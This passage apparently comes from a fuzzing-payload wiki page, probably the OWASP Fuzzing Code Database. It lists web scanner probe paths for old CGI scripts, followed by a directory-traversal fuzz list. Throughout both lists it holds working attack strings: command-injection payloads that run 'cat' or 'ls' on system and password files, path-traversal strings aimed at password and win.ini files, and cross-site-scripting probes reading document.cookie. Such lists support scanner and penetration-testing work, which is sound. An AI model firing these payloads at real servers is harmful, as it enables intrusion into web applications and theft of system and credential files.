clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
